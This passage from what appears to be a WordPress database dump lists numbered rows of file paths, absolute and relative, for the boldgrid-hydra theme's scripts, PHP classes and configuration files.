rtmenus.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/smartmenus/jquery.smartmenus.min.js'),(14436,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/quantity.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/quantity.js'),(14437,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/quantity.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/quantity.min.js'),(14438,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/tabs.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/tabs.js'),(14439,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/tabs.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/tabs.min.js'),(14440,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/user-login.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/user-login.js'),(14441,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/user-login.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/woocommerce/user-login.min.js'),(14442,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/wow/wow.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/wow/wow.js'),(14443,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/wow/wow.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/js/wow/wow.min.js'),(14444,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/boldgrid-theme-framework.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/boldgrid-theme-framework.php'),(14445,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/black-studio-tinymce-widget.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/black-studio-tinymce-widget.php'),(14446,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-admin-pointer.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-admin-pointer.php'),(14447,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-admin.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-admin.php'),(14448,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-compatibility-plugins.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-compatibility-plugins.php'),(14449,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-compatibility-wordpress.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-compatibility-wordpress.php'),(14450,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-compatibility.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-compatibility.php'),(14451,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-text-filters.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-text-filters.php'),(14452,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-widget.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/class-widget.php'),(14453,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/deprecated.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/includes/deprecated.php'),(14454,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pointer.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pointer.js'),(14455,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pointer.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pointer.min.js'),(14456,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre33.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre33.js'),(14457,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre33.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre33.min.js'),(14458,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre39.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre39.js'),(14459,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre39.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre39.min.js'),(14460,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-setup.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-setup.js'),(14461,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-setup.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget-setup.min.js'),(14462,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget.js'),(14463,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/black-studio-tinymce-widget.min.js'),(14464,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/wp-page-widget.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/wp-page-widget.js'),(14465,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/wp-page-widget.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/black-studio-tinymce-widget/js/wp-page-widget.min.js'),(14466,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-404.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-404.php'),(14467,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-activate.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-activate.php'),(14468,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-admin.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-admin.php'),(14469,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-api.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-api.php'),(14470,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-comments.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-comments.php'),(14471,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-compile-colors.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-compile-colors.php'),(14472,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-edit-post-links.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-edit-post-links.php'),(14473,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-editor.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-editor.php'),(14474,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-i18n.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-i18n.php'),(14475,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-loader.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-loader.php'),(14476,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-menu.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-menu.php'),(14477,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-ninja-forms.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-ninja-forms.php'),(14478,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pagination.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pagination.php'),(14479,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pointer.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pointer.php'),(14480,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-schema-markup.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-schema-markup.php'),(14481,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scripts.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scripts.php'),(14482,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss-compile.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss-compile.php'),(14483,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss.php'),(14484,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-search-forms.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-search-forms.php'),(14485,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-setup.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-setup.php'),(14486,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-social-media-icons.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-social-media-icons.php'),(14487,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-staging.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-staging.php'),(14488,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-styles.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-styles.php'),(14489,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-template-config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-template-config.php'),(14490,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-upgrade.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-upgrade.php'),(14491,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-widgets.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-widgets.php'),(14492,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-woocommerce.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-woocommerce.php'),(14493,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wp-fs.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wp-fs.php'),(14494,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wrapper.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wrapper.php'),(14495,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework.php'),(14496,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/action.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/action.config.php'),(14497,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/category.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/category.config.php'),(14498,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/bootstrap.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/bootstrap.config.php'),(14499,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/buttons.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/buttons.config.php'),(14500,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/configs.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/configs.php'),(14501,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/background.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/background.config.php'),(14502,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/colors.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/colors.config.php'),(14503,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/contact-blocks.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/contact-blocks.config.php'),(14504,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/edit.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/edit.config.php'),(14505,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/header-image.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/header-image.config.php'),(14506,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/required.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/required.config.php'),(14507,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/site-title.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/site-title.config.php'),(14508,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/typography.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/typography.config.php'),(14509,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/edit-post-links.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/edit-post-links.config.php'),(14510,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/menu.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/menu.config.php'),(14511,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/scripts.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/scripts.config.php'),(14512,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/social-icons.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/social-icons.config.php'),(14513,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/styles.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/styles.config.php'),(14514,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/supported-features.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/supported-features.config.php'),(14515,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/template.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/template.config.php'),(14516,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tgm.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tgm.config.php'),(14517,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tooltips.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tooltips.config.php'),(14518,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/widget.config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/widget.config.php'),(14519,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-crop.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-crop.php'),(14520,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-type.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-type.php'),(14521,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-palette.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-palette.php'),(14522,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-pattern.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-pattern.php'),(14523,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/index.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/index.php'),(14524,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-background.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-background.php'),(14525,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-colors.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-colors.php'),(14526,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-contact-blocks.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-contact-blocks.php'),(14527,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-device-preview.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-device-preview.php'),(14528,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-edit.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-edit.php'),(14529,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-effects.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-effects.php'),(14530,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-footer.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-footer.php'),(14531,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-help.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-help.php'),(14532,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-kirki.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-kirki.php'),(14533,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-typography.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-typography.php'),(14534,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer.php'),(14535,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/index.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/index.php'),(14536,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/index.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/index.php'),(14537,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/interface-boldgrid-framework-compile.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/interface-boldgrid-framework-compile.php'),(14538,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/images/boldgrid-logo.svg','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/images/boldgrid-logo.svg'),(14539,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/js/dynamic-control.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/js/dynamic-control.js'),(14540,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ar.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ar.js'),(14541,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/az.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/az.js'),(14542,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/bg.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/bg.js'),(14543,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ca.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ca.js'),(14544,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/cs.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/cs.js'),(14545,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/da.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/da.js'),(14546,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/de.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/de.js'),(14547,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/el.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/el.js'),(14548,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/en.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/en.js'),(14549,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/es.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/es.js'),(14550,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/et.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/et.js'),(14551,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/eu.js','w